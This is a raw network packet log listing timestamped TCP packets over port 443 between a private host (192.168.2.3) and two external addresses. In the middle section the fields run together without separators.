Sep 11, 2022 10:16:25.648474932 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.648502111 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.648552895 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.649339914 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.649411917 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.649454117 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.649465084 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.649485111 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.650744915 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.650827885 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.650870085 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.650876999 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.650909901 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.652548075 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.652592897 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.652643919 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.652651072 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.652683020 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.654203892 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.654244900 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.654294014 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.654304028 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.654318094 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.655380964 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.655438900 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
                                                          Sep 11, 2022 10:16:25.655463934 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.655468941 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.655592918 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.657136917 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.657200098 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.657252073 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.657258987 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.657303095 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.659996986 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.660043955 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.660098076 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.660104990 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.660124063 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.660840988 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.660876036 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.660901070 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.660907030 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.660916090 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.662144899 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.662179947 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.662205935 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.662214041 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.662234068 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.663999081 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.664053917 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.664093018 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.664100885 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.664129019 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.665698051 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.665786982 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.665797949 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.707636118 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.859673023 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.859710932 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.859776974 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.859787941 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.859817982 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.859857082 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.859924078 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.859935045 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.859971046 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.860119104 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.861816883 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.861887932 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.861896992 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.861921072 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.861936092 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.861994982 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.862003088 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.862019062 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.862046957 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.862051010 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.862067938 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.862075090 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.862107038 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.862351894 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.862389088 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.862416983 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.862423897 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.862446070 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.864017010 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.864089012 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.864142895 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.864150047 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.864178896 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.864428997 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.864475965 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.864485025 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.864495039 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.864511967 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.864587069 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.864635944 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.864643097 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.864676952 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.864697933 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.864739895 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.865866899 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.865931988 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.865984917 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.865991116 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.866003990 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.867223024 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.867338896 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.867364883 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.868694067 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.868736029 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.868791103 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.868803978 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.868823051 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.869930983 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.870011091 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.870024920 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.870465040 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.870515108 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.870534897 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.870546103 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.870558023 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.871807098 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.871853113 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.871892929 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.871906042 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.871928930 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.874532938 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.874584913 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.874627113 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.874641895 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.874659061 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.875283003 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.875329971 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.875334024 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.875344992 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.875375032 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.875381947 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.875405073 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.875411034 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.875461102 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.879502058 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.879528999 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.879565954 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.879637957 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.879646063 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.879686117 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.880934954 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.880975008 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.881023884 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.881030083 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.881062031 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.883615017 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.883656979 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.883721113 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.883728981 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.883810043 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.885514021 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.885621071 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.887048006 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.887161016 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.887247086 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.890160084 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.890398979 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.891294003 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.891336918 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.891379118 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.891386032 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.891427994 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.894020081 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.894109011 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.894910097 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.894947052 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.894995928 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.895006895 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.895019054 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.901146889 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.901175022 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.901272058 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.901289940 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.901298046 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.901304960 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.901343107 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.901410103 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.901523113 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.901587009 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.901937962 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.902023077 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.905309916 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.906589985 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.908662081 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.908823967 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.075171947 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.075273037 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.075273037 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.075294971 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.075320005 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.075341940 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.075439930 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.075612068 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.075633049 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.075639963 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.075675964 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.075700045 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.075768948 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.075829983 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.075877905 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.075886965 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.076666117 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.076725960 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.076735020 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.076796055 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.076848030 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.076852083 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.076879025 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.076888084 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.077940941 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.078000069 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.078022003 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.078064919 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.078069925 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.078092098 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.078125000 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.078152895 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.078197956 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.078210115 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.078250885 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.078815937 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.078885078 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.078890085 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.078911066 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.078948975 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.082815886 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.082849026 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.082936049 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.082941055 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.082958937 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.082998037 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.083025932 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.083029985 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.083031893 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.083036900 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.083084106 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:26.083479881 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:26.083580017 CEST44349724172.67.188.70192.168.2.3
Sep 11, 2022 10:16:26.083584070 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.083596945 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.083616972 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.083627939 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.083631039 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.083662987 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.083674908 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.083687067 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.083719015 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.084110022 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.084172964 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.084184885 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.084203005 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.084234953 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.084242105 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.084305048 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.084785938 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.084876060 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.084922075 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.084929943 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.084964037 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.085551977 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.085591078 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.085634947 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.085643053 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.085675955 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.086030006 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.086100101 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.086112022 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.086124897 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.086159945 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.086169004 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.086241007 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.086832047 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.086874008 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.086915970 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.086924076 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.086967945 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.088160038 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.088200092 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.088246107 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.088258028 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.088293076 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.088880062 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.088941097 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.089255095 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:26.089272022 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:26.475229979 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.475300074 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.475431919 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.476435900 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.476466894 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.517201900 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.517330885 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.520237923 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.520275116 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.520589113 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.547173977 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.574359894 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.574436903 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.574486971 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.574558020 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.574579954 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.574640036 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.574652910 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.574702978 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.574773073 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.574817896 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.574820042 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.574835062 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.574877024 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.574929953 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.574970961 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
